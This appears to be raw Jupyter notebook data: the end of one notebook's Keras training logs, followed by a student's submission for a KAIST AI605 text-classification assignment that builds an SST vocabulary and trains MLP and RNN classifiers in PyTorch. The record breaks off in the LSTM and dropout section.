"Epoch 1/30\n92/92 [==============================] - 36s 387ms/step - loss: 0.6197 - accuracy: 0.8205 - val_loss: 0.4202 - val_accuracy: 0.8924\nEpoch 2/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.1853 - accuracy: 0.9387 - val_loss: 0.2191 - val_accuracy: 0.9264\nEpoch 3/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0745 - accuracy: 0.9762 - val_loss: 0.2350 - val_accuracy: 0.9414\nEpoch 4/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0346 - accuracy: 0.9877 - val_loss: 0.2229 - val_accuracy: 0.9469\nEpoch 5/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0395 - accuracy: 0.9864 - val_loss: 0.3124 - val_accuracy: 0.9387\nEpoch 6/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0151 - accuracy: 0.9942 - val_loss: 0.3101 - val_accuracy: 0.9428\nEpoch 7/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0153 - accuracy: 0.9949 - val_loss: 0.2850 - val_accuracy: 0.9496\nEpoch 8/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0052 - accuracy: 0.9986 - val_loss: 0.2785 - val_accuracy: 0.9510\nEpoch 9/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0042 - accuracy: 0.9986 - val_loss: 0.2765 - val_accuracy: 0.9550\nEpoch 10/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0037 - accuracy: 0.9983 - val_loss: 0.3254 - val_accuracy: 0.9523\nEpoch 11/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0101 - accuracy: 0.9966 - val_loss: 0.3134 - val_accuracy: 0.9510\nEpoch 12/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0048 - accuracy: 0.9980 - val_loss: 0.2923 - val_accuracy: 0.9482\nEpoch 13/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0025 - accuracy: 0.9990 - val_loss: 0.3210 - val_accuracy: 0.9469\nEpoch 14/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0020 - accuracy: 0.9993 - val_loss: 0.3058 - val_accuracy: 0.9482\nEpoch 15/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0081 - accuracy: 0.9980 - val_loss: 0.3082 - val_accuracy: 0.9578\nEpoch 16/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0017 - accuracy: 0.9997 - val_loss: 0.2838 - val_accuracy: 0.9578\nEpoch 17/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0025 - accuracy: 0.9990 - val_loss: 0.2950 - val_accuracy: 0.9578\nEpoch 18/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.2978 - val_accuracy: 0.9564\nEpoch 19/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9993 - val_loss: 0.2846 - val_accuracy: 0.9591\nEpoch 20/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0034 - accuracy: 0.9986 - val_loss: 0.3410 - val_accuracy: 0.9496\nEpoch 21/30\n92/92 [==============================] - 35s 378ms/step - loss: 7.8189e-04 - accuracy: 1.0000 - val_loss: 0.3331 - val_accuracy: 0.9510\nEpoch 22/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.3307 - val_accuracy: 0.9510\nEpoch 23/30\n92/92 [==============================] - 35s 379ms/step - loss: 3.4142e-04 - accuracy: 1.0000 - val_loss: 0.3373 - val_accuracy: 0.9537\nEpoch 24/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0014 - accuracy: 0.9997 - val_loss: 0.3572 - val_accuracy: 0.9537\nEpoch 25/30\n92/92 [==============================] - 35s 378ms/step - loss: 0.0028 - accuracy: 0.9990 - val_loss: 0.3347 - val_accuracy: 0.9523\nEpoch 26/30\n92/92 [==============================] - 35s 379ms/step - loss: 0.0018 - accuracy: 0.9997 - val_loss: 0.3831 - val_accuracy: 0.9510\nEpoch 27/30\n92/92 [==============================] - 35s 379ms/step - loss: 8.8465e-04 - accuracy: 0.9997 - val_loss: 0.3714 - val_accuracy: 0.9523\nEpoch 28/30\n92/92 [==============================] - 35s 379ms/step - loss: 3.8871e-04 - accuracy: 1.0000 - val_loss: 0.3722 - val_accuracy: 0.9510\nEpoch 29/30\n92/92 [==============================] - 35s 379ms/step - loss: 6.5433e-04 - accuracy: 0.9997 - val_loss: 0.3691 - val_accuracy: 0.9550\nEpoch 30/30\n92/92 [==============================] - 35s 379ms/step - loss: 8.1220e-04 - accuracy: 0.9997 - val_loss: 0.3629 - val_accuracy: 0.9537\n"
]
],
[
[
"## Visualization",
"_____no_output_____"
]
],
[
[
"# add the two histories and print the diagram\nhelpers.plot_two_histories(history_data_augmentation, history_finetune_data_augmentation)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
]
] |
cb2a7732cd51cea7316cca50e11895e39b1cfa3b | 147,399 | ipynb | Jupyter Notebook | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | AI605/KAIST_AI605_Assignment_1.ipynb | sungnyun/AI-assignments | 6451fd6db33fd8671ca362b4ad4c190979a98c22 | [
"MIT"
] | null | null | null | 33.830388 | 496 | 0.583532 | [
[
[
"# KAIST AI605 Assignment 1: Text Classification\nTA in charge: Miyoung Ko ([email protected])\n\n**Due Date:** September 29 (Wed) 11:00pm, 2021\n\n## Your Submission\nIf you are a KAIST student, you will submit your assignment via [KLMS](https://klms.kaist.ac.kr). If you are a NAVER student, you will submit via [Google Form](https://forms.gle/aGZZ86YpCdv2zEVt9). \n\nYou need to submit both (1) a PDF of this notebook, and (2) a link to CoLab for execution (.ipynb file is also allowed).\n\nUse in-line LaTeX (see below) for mathematical expressions. Collaboration among students is allowed but it is not a group assignment so make sure your answer and code are your own. Make sure to mention your collaborators in your assignment with their names and their student ids.\n\n## Grading\nThe entire assignment is out of 20 points. You can obtain up to 5 bonus points (i.e. max score is 25 points). For every late day, your grade will be deducted by 2 points (KAIST students only). You can use one of your no-penalty late days (7 days in total). Make sure to mention this in your submission. You will receive a grade of zero if you submit after 7 days.\n\n\n## Environment\nYou will only use Python 3.7 and PyTorch 1.9, which is already available on Colab:",
"_____no_output_____"
]
],
[
[
"from platform import python_version\nimport torch\n\nprint(\"python\", python_version())\nprint(\"torch\", torch.__version__)",
"python 3.8.3\ntorch 1.7.0\n"
]
],
[
[
"## 1. Limitations of Vanilla RNNs\nIn Lecture 02, we saw that a multi-layer perceptron (MLP) without activation function is equivalent to a single linear transformation with respect to the inputs. One can define a vanilla recurrent neural network without activation as, given inputs $\\textbf{x}_1 \\dots \\textbf{x}_T$, the outputs $\\textbf{h}_t$ is obtained by\n$$\\textbf{h}_t = \\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b},$$\nwhere $\\textbf{V}, \\textbf{U}, \\textbf{b}$ are trainable weights. \n\n> **Problem 1.1** *(2 point)* Show that such recurrent neural network (RNN) without activation function is equivalent to a single linear transformation with respect to the inputs, which means each $\\textbf{h}_t$ is a linear combination of the inputs.\n\n\n\nIn Lecture 05 and 06, we will see how RNNs can model non-linearity via activation function, but they still suffer from exploding or vanishing gradients. We can mathematically show that, if the recurrent relation is\n$$ \\textbf{h}_t = \\sigma (\\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b}) $$\nthen\n$$ \\frac{\\partial \\textbf{h}_t}{\\partial \\textbf{h}_{t-1}} = \\text{diag}(\\sigma' (\\textbf{V}\\textbf{h}_{t-1} + \\textbf{U}\\textbf{x}_t + \\textbf{b}))\\textbf{V}$$\nso\n$$\\frac{\\partial \\textbf{h}_T}{\\partial \\textbf{h}_1} \\propto \\textbf{V}^{T-1}$$\nwhich means this term will be very close to zero if the norm of $\\bf{V}$ is smaller than 1 and really big otherwise.\n\n> **Problem 1.2** *(2 points)* Explain how exploding gradient can be mitigated if we use gradient clipping.\n\n> **Problem 1.3** *(2 points)* Explain how vanishing gradient can be mitigated if we use LSTM. See the Lecture 05 and 06 slides for the definition of LSTM.",
"_____no_output_____"
],
[
"## (Answer)\n\n**Problem 1.1.**\nFor every $t$, $\\mathbf{h}_t$ is recursively defined as\n$$ \\mathbf{h}_t = \\mathbf{V}\\mathbf{h}_{t-1} + \\mathbf{U}\\mathbf{x}_t + \\mathbf{b} = \\mathbf{V}(\\mathbf{V}\\mathbf{h}_{t-2} + \\mathbf{U}\\mathbf{x}_{t-1} + \\mathbf{b}) + \\mathbf{U}\\mathbf{x}_t + \\mathbf{b}$$\n$$ =\\cdots = \\mathbf{V}^t\\mathbf{h}_0 + \\sum_{k=0}^{t-1} \\mathbf{V}^{k}\\mathbf{U}\\mathbf{x}_{t-k} + \\sum_{k=0}^{t-1} \\mathbf{V}^k \\mathbf{b} $$\nwhich is a linear combination of the inputs $\\mathbf{x}_1,\\mathbf{x}_2,\\cdots,\\mathbf{x}_t$. This holds for every $t$, therefore RNN without non-linear activation function is equiavlent to a single linear transformation of the inputs.\n\n**Problem 1.2.**\nIf we use gradient clipping, the norm of $\\mathbf{V}$ does not exceed some value, i.e., 1. Then, the gradient $\\frac{\\partial\\mathbf{h}_T}{\\partial\\mathbf{h}_1}$ can be reduced, mitigating the exploding gradient issue.\n\n**Problem 1.3.**\nIn LSTM, activation function helps avoiding vanishing gradient. In the recurrency of the LSTM, the activation function is the identity function with a derivative of 1.0. Specifically, the effective weight of the recurrency is equal to the forget gate activation. So, if the forget gate is on (activation close to 1.0), the gradient does not vanish. ",
"_____no_output_____"
],
[
"## 2. Creating Vocabulary from Training Data\nCreating the vocabulary is the first step for every natural language processing model. In this section, you will use Stanford Sentiment Treebank (SST), a popular dataset for sentiment classification, to create your vocabulary.\n\n### Obtaining SST via Hugging Face\nWe will use `datasets` package offered by Hugging Face, which allows us to easily download various language datasets, including Stanford Sentiment Treebank.\n\nFirst, install the package:",
"_____no_output_____"
]
],
[
[
"!pip install datasets",
"Collecting datasets\n Downloading datasets-1.12.1-py3-none-any.whl (270 kB)\n\u001b[K |████████████████████████████████| 270 kB 12.2 MB/s \n\u001b[?25hRequirement already satisfied: multiprocess in /usr/local/lib/python3.7/dist-packages (from datasets) (0.70.12.2)\nRequirement already satisfied: pyarrow!=4.0.0,>=1.0.0 in /usr/local/lib/python3.7/dist-packages (from datasets) (3.0.0)\nRequirement already satisfied: tqdm>=4.62.1 in /usr/local/lib/python3.7/dist-packages (from datasets) (4.62.2)\nRequirement already satisfied: pandas in /usr/local/lib/python3.7/dist-packages (from datasets) (1.1.5)\nCollecting huggingface-hub<0.1.0,>=0.0.14\n Downloading huggingface_hub-0.0.17-py3-none-any.whl (52 kB)\n\u001b[K |████████████████████████████████| 52 kB 1.6 MB/s \n\u001b[?25hRequirement already satisfied: packaging in /usr/local/lib/python3.7/dist-packages (from datasets) (21.0)\nRequirement already satisfied: requests>=2.19.0 in /usr/local/lib/python3.7/dist-packages (from datasets) (2.23.0)\nRequirement already satisfied: numpy>=1.17 in /usr/local/lib/python3.7/dist-packages (from datasets) (1.19.5)\nCollecting xxhash\n Downloading xxhash-2.0.2-cp37-cp37m-manylinux2010_x86_64.whl (243 kB)\n\u001b[K |████████████████████████████████| 243 kB 41.0 MB/s \n\u001b[?25hRequirement already satisfied: importlib-metadata in /usr/local/lib/python3.7/dist-packages (from datasets) (4.8.1)\nRequirement already satisfied: dill in /usr/local/lib/python3.7/dist-packages (from datasets) (0.3.4)\nCollecting aiohttp\n Downloading aiohttp-3.7.4.post0-cp37-cp37m-manylinux2014_x86_64.whl (1.3 MB)\n\u001b[K |████████████████████████████████| 1.3 MB 46.5 MB/s \n\u001b[?25hCollecting fsspec[http]>=2021.05.0\n Downloading fsspec-2021.9.0-py3-none-any.whl (123 kB)\n\u001b[K |████████████████████████████████| 123 kB 52.2 MB/s \n\u001b[?25hRequirement already satisfied: filelock in /usr/local/lib/python3.7/dist-packages (from huggingface-hub<0.1.0,>=0.0.14->datasets) (3.0.12)\nRequirement already satisfied: typing-extensions in /usr/local/lib/python3.7/dist-packages (from huggingface-hub<0.1.0,>=0.0.14->datasets) (3.7.4.3)\nRequirement already satisfied: pyparsing>=2.0.2 in /usr/local/lib/python3.7/dist-packages (from packaging->datasets) (2.4.7)\nRequirement already satisfied: chardet<4,>=3.0.2 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (3.0.4)\nRequirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (2021.5.30)\nRequirement already satisfied: urllib3!=1.25.0,!=1.25.1,<1.26,>=1.21.1 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (1.24.3)\nRequirement already satisfied: idna<3,>=2.5 in /usr/local/lib/python3.7/dist-packages (from requests>=2.19.0->datasets) (2.10)\nCollecting yarl<2.0,>=1.0\n Downloading yarl-1.6.3-cp37-cp37m-manylinux2014_x86_64.whl (294 kB)\n\u001b[K |████████████████████████████████| 294 kB 49.8 MB/s \n\u001b[?25hCollecting async-timeout<4.0,>=3.0\n Downloading async_timeout-3.0.1-py3-none-any.whl (8.2 kB)\nRequirement already satisfied: attrs>=17.3.0 in /usr/local/lib/python3.7/dist-packages (from aiohttp->datasets) (21.2.0)\nCollecting multidict<7.0,>=4.5\n Downloading multidict-5.1.0-cp37-cp37m-manylinux2014_x86_64.whl (142 kB)\n\u001b[K |████████████████████████████████| 142 kB 52.5 MB/s \n\u001b[?25hRequirement already satisfied: zipp>=0.5 in /usr/local/lib/python3.7/dist-packages (from importlib-metadata->datasets) (3.5.0)\nRequirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.7/dist-packages (from pandas->datasets) (2018.9)\nRequirement already satisfied: python-dateutil>=2.7.3 in /usr/local/lib/python3.7/dist-packages (from pandas->datasets) (2.8.2)\nRequirement already satisfied: six>=1.5 in /usr/local/lib/python3.7/dist-packages (from python-dateutil>=2.7.3->pandas->datasets) (1.15.0)\nInstalling collected packages: multidict, yarl, async-timeout, fsspec, aiohttp, xxhash, huggingface-hub, datasets\nSuccessfully installed aiohttp-3.7.4.post0 async-timeout-3.0.1 datasets-1.12.1 fsspec-2021.9.0 huggingface-hub-0.0.17 multidict-5.1.0 xxhash-2.0.2 yarl-1.6.3\n"
]
],
[
[
"Then download SST and print the first example:",
"_____no_output_____"
]
],
[
[
"from datasets import load_dataset\nfrom pprint import pprint\n\nsst_dataset = load_dataset('sst')\npprint(sst_dataset['train'][0])",
"No config specified, defaulting to: sst/default\nReusing dataset sst (/home/sungnyun/.cache/huggingface/datasets/sst/default/1.0.0/b8a7889ef01c5d3ae8c379b84cc4080f8aad3ac2bc538701cbe0ac6416fb76ff)\n"
]
],
[
[
"Note that each `label` is a score between 0 and 1. You will round it to either 0 or 1 for binary classification (positive for 1, negative for 0).\nIn this first example, the label is rounded to 1, meaning that the sentence is a positive review.\nYou will only use `sentence` as the input; please ignore other values.",
"_____no_output_____"
],
[
"> **Problem 2.1** *(2 points)* Using space tokenizer, create the vocabulary for the training data and report the vocabulary size here. Make sure that you add an `UNK` token to the vocabulary to account for words (during inference time) that you haven't seen. See below for an example with a short text.",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 2.1.**\nVocabulary size is 18282, including 'PAD' and 'UNK' token. (see the code below)",
"_____no_output_____"
]
],
[
[
"# Space tokenization\ntext = \"Hello world!\"\ntokens = text.split(' ')\nprint(tokens)",
"['Hello', 'world!']\n"
],
[
"# Constructing vocabulary with `UNK`\nvocab = ['PAD', 'UNK'] + list(set(text.split(' ')))\nword2id = {word: id_ for id_, word in enumerate(vocab)}\nprint(vocab)\nprint(word2id['Hello'])",
"['PAD', 'UNK', 'Hello', 'world!']\n2\n"
],
[
"### Problem 2.1 ###\nvocab = ['PAD', 'UNK']\nfor data in sst_dataset['train']:\n for word in data['sentence'].split(' '):\n if word not in vocab:\n vocab.append(word)\nword2id = {word: id_ for id_, word in enumerate(vocab)}\n\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 18282\n"
]
],
[
[
"> **Problem 2.2** *(1 point)* Using all words in the training data will make the vocabulary very big. Reduce its size by only including words that occur at least 2 times. How does the size of the vocabulary change?",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 2.2.**\nVocabulary size is now 8738, including 'PAD' and 'UNK' token. (see the code below)",
"_____no_output_____"
]
],
[
[
"### Problem 2.2 ###\nvocab = ['PAD', 'UNK']\nvocab_count = {}\nfor data in sst_dataset['train']:\n for word in data['sentence'].split(' '):\n if word not in vocab and word not in vocab_count.keys():\n vocab_count[word] = 1\n elif word not in vocab and word in vocab_count.keys():\n vocab_count[word] += 1\n if vocab_count[word] >= 2:\n vocab.append(word)\n else:\n continue\nword2id = {word: id_ for id_, word in enumerate(vocab)}\n\nprint('Vocabulary size: {}'.format(len(vocab)))",
"Vocabulary size: 8738\n"
]
],
[
[
"## 3. Text Classification with Multi-Layer Perceptron and Recurrent Neural Network\n\nYou can now use the vocabulary constructed from the training data to create an embedding matrix. You will use the embedding matrix to map each input sequence of tokens to a list of embedding vectors. One of the simplest baseline is to fix the input length (with truncation or padding), flatten the word embeddings, apply a linear transformation followed by an activation, and finally classify the output into the two classes: ",
"_____no_output_____"
]
],
[
[
"from torch import nn\n\nlength = 8\ninput_ = \"hi world!\"\ninput_tokens = input_.split(' ')\ninput_ids = [word2id[word] if word in word2id else 1 for word in input_tokens] # UNK if word not found\nif len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\nelse:\n input_ids = input_ids[:length]\n\ninput_tensor = torch.LongTensor([input_ids]) # the first dimension is minibatch size\nprint(input_tensor)",
"tensor([[1, 1, 0, 0, 0, 0, 0, 0]])\n"
],
[
"# Two-layer MLP classification\nclass Baseline(nn.Module):\n def __init__(self, d, length):\n super(Baseline, self).__init__()\n self.embedding = nn.Embedding(len(vocab), d)\n self.layer = nn.Linear(d * length, d, bias=True)\n self.relu = nn.ReLU()\n self.class_layer = nn.Linear(d, 2, bias=True)\n\n def forward(self, input_tensor):\n emb = self.embedding(input_tensor) # [batch_size, length, d]\n emb_flat = emb.view(emb.size(0), -1) # [batch_size, length*d]\n hidden = self.relu(self.layer(emb_flat))\n logits = self.class_layer(hidden)\n return logits\n\nd = 3 # usually bigger, e.g. 128\nbaseline = Baseline(d, length).cuda()\nlogits = baseline(input_tensor.cuda())\nsoftmax = nn.Softmax(1)\nprint(softmax(logits)) # probability for each class",
"tensor([[0.1654, 0.8346]], device='cuda:0', grad_fn=<SoftmaxBackward>)\n"
]
],
[
[
"Now we will compute the loss, which is the negative log probability of the input text's label being the target label (`1`), which in fact turns out to be equivalent to the cross entropy (https://en.wikipedia.org/wiki/Cross_entropy) between the probability distribution and a one-hot distribution of the target label (note that we use `logits` instead of `softmax(logits)` as the input to the cross entropy, which allow us to avoid numerical instability). ",
"_____no_output_____"
]
],
[
[
"cel = nn.CrossEntropyLoss()\nlabel = torch.LongTensor([1]).cuda() # The ground truth label for \"hi world!\" is positive.\nloss = cel(logits, label) # Loss, a.k.a L\nprint(loss)",
"tensor(0.1809, device='cuda:0', grad_fn=<NllLossBackward>)\n"
]
],
[
[
"Once we have the loss defined, only one step remains! We compute the gradients of parameters with respective to the loss and update. Fortunately, PyTorch does this for us in a very convenient way. Note that we used only one example to update the model, which is basically a Stochastic Gradient Descent (SGD) with minibatch size of 1. A recommended minibatch size in this exercise is at least 16. It is also recommended that you reuse your training data at least 10 times (i.e. 10 *epochs*).",
"_____no_output_____"
]
],
[
[
"optimizer = torch.optim.SGD(baseline.parameters(), lr=0.1)\noptimizer.zero_grad() # reset process\nloss.backward() # compute gradients\noptimizer.step() # update parameters",
"_____no_output_____"
]
],
[
[
"Once you have done this, all weight parameters will have `grad` attributes that contain their gradients with respect to the loss.",
"_____no_output_____"
]
],
[
[
"print(baseline.layer.weight.grad) # dL/dw of weights in the linear layer",
"tensor([[ 3.7857e-04, -3.7395e-03, -6.8773e-05, 3.7857e-04, -3.7395e-03,\n -6.8773e-05, 9.9354e-04, 2.3825e-03, 4.2434e-03, 9.9354e-04,\n 2.3825e-03, 4.2434e-03, 9.9354e-04, 2.3825e-03, 4.2434e-03,\n 9.9354e-04, 2.3825e-03, 4.2434e-03, 9.9354e-04, 2.3825e-03,\n 4.2434e-03, 9.9354e-04, 2.3825e-03, 4.2434e-03],\n [-2.7539e-02, 2.7203e-01, 5.0028e-03, -2.7539e-02, 2.7203e-01,\n 5.0028e-03, -7.2274e-02, -1.7331e-01, -3.0868e-01, -7.2274e-02,\n -1.7331e-01, -3.0868e-01, -7.2274e-02, -1.7331e-01, -3.0868e-01,\n -7.2274e-02, -1.7331e-01, -3.0868e-01, -7.2274e-02, -1.7331e-01,\n -3.0868e-01, -7.2274e-02, -1.7331e-01, -3.0868e-01],\n [ 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00,\n 0.0000e+00, 0.0000e+00, 0.0000e+00, 0.0000e+00]], device='cuda:0')\n"
]
],
[
[
"> **Problem 3.1** *(2 points)* Properly train a MLP baseline model on SST and report the model's accuracy on the dev data.\n\n> **Problem 3.2** *(2 points)* Implement a recurrent neural network (without using PyTorch's RNN module) with `tanh` activation, and use the output of the RNN at the final time step for the classification. Report the model's accuracy on the dev data.\n\n> **Problem 3.3** *(2 points)* Show that the cross entropy computed above is equivalent to the negative log likelihood of the probability distribution.\n\n> **Problem 3.4 (bonus)** *(1 points)* Why is it numerically unstable if you compute log on top of softmax?",
"_____no_output_____"
],
[
"## (Answer)\n**Problem 3.1.**\n(See the code below.) Validation accuracy of MLP after 10 epochs is 55.40%.\n\n**Problem 3.2.** \n(See the code below.) Validation accuracy of RNN after 10 epochs is 57.49%.\n\n**Problem 3.3.** \nThe cross-entropy computed above is formulated as\n$$ H(p,\\hat{p}) = -\\sum_x \\sum_i p_i(x) \\log \\hat{p}_i(x) $$\nwhere $p$ is the one-hot probability vector of the ground-truth label, and $\\hat{p}$ is the predicted probability distribution. Since $p_i$ is 0 except for the ground-truth label dimension, the above form is equivalent to\n$$ -\\sum_x \\log\\hat{y}(x) $$\nwhich is negative log likelihood (NLL).\n\n**Problem 3.4.**\nSoftmax function computes the exponential term with logit values. However, if the logit values are too large, overflow can happen in our computer, i.e., it is only concentrated on the largest value. Likewise, if the logit values are too small, underflow happens and the values are equally assigned.",
"_____no_output_____"
]
],
[
[
"### Problem 3.1 ###\n\nclass SSTDataset(torch.utils.data.Dataset):\n def __init__(self, split, length=16):\n assert split in ['train', 'validation', 'test']\n self._data = sst_dataset[split]\n self.input_lst, self.label_lst = [], []\n for data in self._data:\n sentence = data['sentence'] \n tokens = sentence.split(' ')\n input_ids = [word2id[word] if word in word2id else 1 for word in tokens] # UNK if word not found\n if len(input_ids) < length:\n input_ids = input_ids + [0] * (length - len(input_ids)) # PAD tokens at the end\n else:\n input_ids = input_ids[:length]\n self.input_lst.append(torch.LongTensor(input_ids))\n\n label = round(data['label'])\n self.label_lst.append(label)\n\n def __getitem__(self, idx):\n return self.input_lst[idx], self.label_lst[idx]\n\n def __len__(self):\n return len(self._data)\n\n\ntrainset = SSTDataset('train')\nvalidset = SSTDataset('validation')\ntrain_loader = torch.utils.data.DataLoader(trainset, batch_size=16, shuffle=True)\nvalid_loader = torch.utils.data.DataLoader(validset, batch_size=16, shuffle=False)\n\nbaseline = Baseline(d=128, length=16).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.SGD(baseline.parameters(), lr=0.01)\n\n\nfor epoch in range(10):\n baseline.train()\n avg_loss = 0\n for input, label in train_loader:\n input = input.cuda()\n label = label.cuda()\n logits = baseline(input)\n loss = cel(logits, label)\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n baseline.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n input = input.cuda()\n logits = baseline(input)\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.6926739388860567\nEpoch 1, Valid Acc 0.5485921889191644\nEpoch 2, Train Loss 0.6309732247269555\nEpoch 2, Valid Acc 0.5358764759309719\nEpoch 3, Train Loss 0.5576151426365313\nEpoch 3, Valid Acc 0.5440508628519528\nEpoch 4, Train Loss 0.4595080493541246\nEpoch 4, Valid Acc 0.5286103542234333\nEpoch 5, Train Loss 0.35082442009270415\nEpoch 5, Valid Acc 0.5513169845594914\nEpoch 6, Train Loss 0.2495291709397616\nEpoch 6, Valid Acc 0.5395095367847411\nEpoch 7, Train Loss 0.17458258945955318\nEpoch 7, Valid Acc 0.5376930063578564\nEpoch 8, Train Loss 0.12860913224839204\nEpoch 8, Valid Acc 0.5522252497729337\nEpoch 9, Train Loss 0.09566429610039746\nEpoch 9, Valid Acc 0.5367847411444142\nEpoch 10, Train Loss 0.07502119265468826\nEpoch 10, Valid Acc 0.5504087193460491\n==================================================\nLast Validation Accuracy: 0.5504087193460491\n"
],
[
"### Problem 3.2 ###\n\nclass RNN(nn.Module):\n def __init__(self, seq_length, hidden_dim, embed_dim):\n super(RNN, self).__init__()\n self.seq_length = seq_length\n self.hidden_dim = hidden_dim\n self.embed_dim = embed_dim\n\n self.embedding = nn.Embedding(len(vocab), embed_dim)\n self.linear = nn.Linear(embed_dim + hidden_dim, hidden_dim)\n self.classifier = nn.Linear(hidden_dim, 2)\n self.tanh = nn.Tanh()\n\n def forward(self, input):\n assert self.seq_length == input.size(1) # batch_first\n emb = self.embedding(input)\n h_t = torch.autograd.Variable(torch.zeros(emb.size(0), self.hidden_dim)).cuda()\n\n for seq in range(self.seq_length):\n x = torch.cat([emb[:, seq, :], h_t], dim=-1)\n h_t = self.tanh(self.linear(x))\n\n out = self.classifier(h_t)\n return out\n\nrnn = RNN(seq_length=16, hidden_dim=64, embed_dim=64).cuda()\ncel = nn.CrossEntropyLoss()\noptimizer = torch.optim.Adam(rnn.parameters(), lr=0.001)\n\nfor epoch in range(10):\n rnn.train()\n avg_loss = 0\n for input, label in train_loader:\n logits = rnn(input.cuda())\n loss = cel(logits, label.cuda())\n avg_loss += loss.item()\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n print(f'Epoch {epoch+1}, Train Loss {avg_loss / len(train_loader)}')\n\n rnn.eval()\n acc, count = 0, 0\n for input, label in valid_loader:\n with torch.no_grad():\n logits = rnn(input.cuda())\n _, preds = torch.max(logits, dim=1)\n acc += (preds.cpu().data == label).sum().item()\n count += float(input.size(0))\n acc /= count\n print(f'Epoch {epoch+1}, Valid Acc {acc}')\n\nprint('='*50)\nprint(f'Last Validation Accuracy: {acc}')",
"Epoch 1, Train Loss 0.7002752028154523\nEpoch 1, Valid Acc 0.5049954586739328\nEpoch 2, Train Loss 0.6841855224375422\nEpoch 2, Valid Acc 0.5549500454132607\nEpoch 3, Train Loss 0.6612656375442105\nEpoch 3, Valid Acc 0.5776566757493188\nEpoch 4, Train Loss 0.6143353563011362\nEpoch 4, Valid Acc 0.6239782016348774\nEpoch 5, Train Loss 0.5568217269601893\nEpoch 5, Valid Acc 0.6021798365122616\nEpoch 6, Train Loss 0.501285749037614\nEpoch 6, Valid Acc 0.6584922797456857\nEpoch 7, Train Loss 0.4489893540460965\nEpoch 7, Valid Acc 0.6575840145322435\nEpoch 8, Train Loss 0.38173778384421647\nEpoch 8, Valid Acc 0.6657584014532243\nEpoch 9, Train Loss 0.3311019776884313\nEpoch 9, Valid Acc 0.6512261580381471\nEpoch 10, Train Loss 0.3220137807676631\nEpoch 10, Valid Acc 0.5749318801089919\n==================================================\nLast Validation Accuracy: 0.5749318801089919\n"
]
],
[
[
"## 4. Text Classification with LSTM and Dropout\n\nReplace your RNN module with an LSTM module. See Lecture slides 05 and 06 for the formal definition of LSTMs. \n\nYou will also use Dropout, which randomly makes each dimension zero with the probability of `p` and scale it by `1/(1-p)` if it is not zero during training. Put it either at the input or the output of the LSTM to prevent it from overfitting.",
"_____no_output_____"
]
],
[
[
"a = torch.FloatTensor([0.1, 0.3, 0.5, 0.7, 0.9])\ndropout = nn.Dropout(0.5) # p=0.5\nprint(dropout(a))",
